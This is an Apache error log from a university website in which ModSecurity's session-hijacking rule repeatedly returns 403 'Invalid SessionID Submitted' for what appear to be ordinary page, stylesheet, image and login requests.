[Mon Aug 28 07:55:01.416543 2023] [:error] [pid 37918] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwZcCo-f0AAJQeRkkAAAAP"]
[Mon Aug 28 07:55:01.588125 2023] [:error] [pid 38114] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvwZcCo-f0AAJTinQsAAAAE"]
[Mon Aug 28 07:55:03.597260 2023] [:error] [pid 38113] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwZ8Co-f0AAJTh5GQAAAAD"]
[Mon Aug 28 07:55:06.424389 2023] [:error] [pid 38059] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwasCo-f0AAJSr2iQAAAAO"]
[Mon Aug 28 07:55:08.717148 2023] [:error] [pid 38113] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwbMCo-f0AAJTh5GUAAAAD"]
[Mon Aug 28 07:55:09.768110 2023] [:error] [pid 37918] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwbcCo-f0AAJQeRkwAAAAP"]
[Mon Aug 28 07:55:10.660365 2023] [:error] [pid 38075] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvwbsCo-f0AAJS7RwwAAAAB"]
[Mon Aug 28 07:55:10.675661 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvwbsCo-f0AAJKjZ1QAAAAG"]
[Mon Aug 28 07:55:10.679144 2023] [:error] [pid 38068] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvwbsCo-f0AAJS0EnoAAAAW"]
[Mon Aug 28 07:55:10.719398 2023] [:error] [pid 38060] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvwbsCo-f0AAJSsrTwAAAAQ"]
[Mon Aug 28 07:55:10.753666 2023] [:error] [pid 37803] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvwbsCo-f0AAJOr9wcAAAAL"]
[Mon Aug 28 07:55:10.758817 2023] [:error] [pid 37918] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvwbsCo-f0AAJQeRk0AAAAP"]
[Mon Aug 28 07:55:13.266789 2023] [:error] [pid 37844] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvwccCo-f0AAJPUAl4AAAAA"]
[Mon Aug 28 07:55:14.883613 2023] [:error] [pid 37539] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvwcsCo-f0AAJKjZ1YAAAAG"]
[Mon Aug 28 07:55:16.283326 2023] [:error] [pid 38060] [client 180.244.139.78] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvwdMCo-f0AAJSsrT4AAAAQ"]
[Mon Aug 28 07:58:18.460011 2023] [:error] [pid 38151] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvxKsCo-f0AAJUH75EAAAAF"]
[Mon Aug 28 07:58:18.582714 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxKsCo-f0AAJTh5I4AAAAD"]
[Mon Aug 28 07:58:26.953693 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxMsCo-f0AAJTh5JAAAAAD"]
[Mon Aug 28 07:58:27.217110 2023] [:error] [pid 38068] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxM8Co-f0AAJS0EqMAAAAW"]
[Mon Aug 28 07:58:33.320792 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvxOcCo-f0AAJTh5JMAAAAD"]
[Mon Aug 28 07:58:33.499334 2023] [:error] [pid 38068] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxOcCo-f0AAJS0EqUAAAAW"]
[Mon Aug 28 07:59:33.104206 2023] [:error] [pid 38075] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvxdcCo-f0AAJS7RzsAAAAB"]
[Mon Aug 28 07:59:34.379686 2023] [:error] [pid 37803] [client 66.249.70.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvxdsCo-f0AAJOr9zIAAAAL"]
[Mon Aug 28 07:59:35.403832 2023] [:error] [pid 38060] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvxd8Co-f0AAJSsrWsAAAAQ"]
[Mon Aug 28 07:59:36.368599 2023] [:error] [pid 38059] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvxeMCo-f0AAJSr2l0AAAAO"]
[Mon Aug 28 08:00:13.814346 2023] [:error] [pid 38151] [client 36.72.11.144] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvxncCo-f0AAJUH76MAAAAF"]
[Mon Aug 28 08:00:21.732155 2023] [:error] [pid 38075] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxpcCo-f0AAJS7R0UAAAAB"]
[Mon Aug 28 08:00:22.019763 2023] [:error] [pid 38060] [client 125.164.18.187] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxpsCo-f0AAJSsrXIAAAAQ"]
[Mon Aug 28 08:00:23.536889 2023] [:error] [pid 38068] [client 125.164.22.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxp8Co-f0AAJS0ErgAAAAW"]
[Mon Aug 28 08:00:23.716068 2023] [:error] [pid 38151] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxp8Co-f0AAJUH76YAAAAF"]
[Mon Aug 28 08:00:24.984567 2023] [:error] [pid 38075] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxqMCo-f0AAJS7R0YAAAAB"]
[Mon Aug 28 08:00:25.128734 2023] [:error] [pid 38114] [client 125.164.19.111] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxqcCo-f0AAJTinTsAAAAE"]
[Mon Aug 28 08:00:27.869602 2023] [:error] [pid 38151] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxq8Co-f0AAJUH76cAAAAF"]
[Mon Aug 28 08:00:27.927749 2023] [:error] [pid 38060] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxq8Co-f0AAJSsrXMAAAAQ"]
[Mon Aug 28 08:00:35.264048 2023] [:error] [pid 38151] [client 125.164.23.133] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxs8Co-f0AAJUH76kAAAAF"]
[Mon Aug 28 08:00:35.404678 2023] [:error] [pid 38114] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxs8Co-f0AAJTinT8AAAAE"]
[Mon Aug 28 08:00:40.222802 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxuMCo-f0AAJS0ErwAAAAW"]
[Mon Aug 28 08:00:40.671941 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxuMCo-f0AAJUFNN0AAAAA"]
[Mon Aug 28 08:00:41.561225 2023] [:error] [pid 38075] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxucCo-f0AAJS7R0wAAAAB"]
[Mon Aug 28 08:00:41.712934 2023] [:error] [pid 38061] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxucCo-f0AAJSt5Z0AAAAR"]
[Mon Aug 28 08:00:41.790864 2023] [:error] [pid 38068] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxucCo-f0AAJS0Er0AAAAW"]
[Mon Aug 28 08:00:41.915168 2023] [:error] [pid 38114] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxucCo-f0AAJTinUIAAAAE"]
[Mon Aug 28 08:00:41.954774 2023] [:error] [pid 38065] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxucCo-f0AAJSxYqUAAAAH"]
[Mon Aug 28 08:00:41.965183 2023] [:error] [pid 38149] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxucCo-f0AAJUFNN4AAAAA"]
[Mon Aug 28 08:00:45.967089 2023] [:error] [pid 37803] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOvxvcCo-f0AAJOr90AAAAAL"]
[Mon Aug 28 08:00:46.087879 2023] [:error] [pid 38068] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxvsCo-f0AAJS0Er8AAAAW"]
[Mon Aug 28 08:00:46.243317 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvxvsCo-f0AAJTinUMAAAAE"]
[Mon Aug 28 08:00:46.373044 2023] [:error] [pid 38061] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxvsCo-f0AAJSt5Z4AAAAR"]
[Mon Aug 28 08:00:47.198452 2023] [:error] [pid 38151] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxv8Co-f0AAJUH760AAAAF"]
[Mon Aug 28 08:00:47.200557 2023] [:error] [pid 38059] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxv8Co-f0AAJSr2m0AAAAO"]
[Mon Aug 28 08:00:47.200993 2023] [:error] [pid 38065] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxv8Co-f0AAJSxYqcAAAAH"]
[Mon Aug 28 08:00:47.214958 2023] [:error] [pid 38061] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxv8Co-f0AAJSt5Z8AAAAR"]
[Mon Aug 28 08:00:47.379352 2023] [:error] [pid 38068] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxv8Co-f0AAJS0EsEAAAAW"]
[Mon Aug 28 08:00:47.410593 2023] [:error] [pid 38059] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxv8Co-f0AAJSr2m4AAAAO"]
[Mon Aug 28 08:00:57.478869 2023] [:error] [pid 38151] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvxycCo-f0AAJUH77MAAAAF"]
[Mon Aug 28 08:00:57.687564 2023] [:error] [pid 38059] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvxycCo-f0AAJSr2nIAAAAO"]
[Mon Aug 28 08:00:57.717442 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/form-bg.png"] [unique_id "ZOvxycCo-f0AAJS0EsYAAAAW"]
[Mon Aug 28 08:00:57.731638 2023] [:error] [pid 38192] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg_form.png"] [unique_id "ZOvxycCo-f0AAJUwn3cAAAAI"]
[Mon Aug 28 08:00:57.882944 2023] [:error] [pid 38059] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login2.png"] [unique_id "ZOvxycCo-f0AAJSr2nMAAAAO"]
[Mon Aug 28 08:00:58.153004 2023] [:error] [pid 38194] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxysCo-f0AAJUy1q4AAAAK"]
[Mon Aug 28 08:01:07.927380 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx08Co-f0AAJSxYq0AAAAH"]
[Mon Aug 28 08:01:17.983533 2023] [:error] [pid 38075] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvx3cCo-f0AAJS7R04AAAAB"]
[Mon Aug 28 08:01:26.115940 2023] [:error] [pid 38193] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvx5sCo-f0AAJUxupQAAAAJ"]
[Mon Aug 28 08:01:26.417434 2023] [:error] [pid 38075] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx5sCo-f0AAJS7R08AAAAB"]
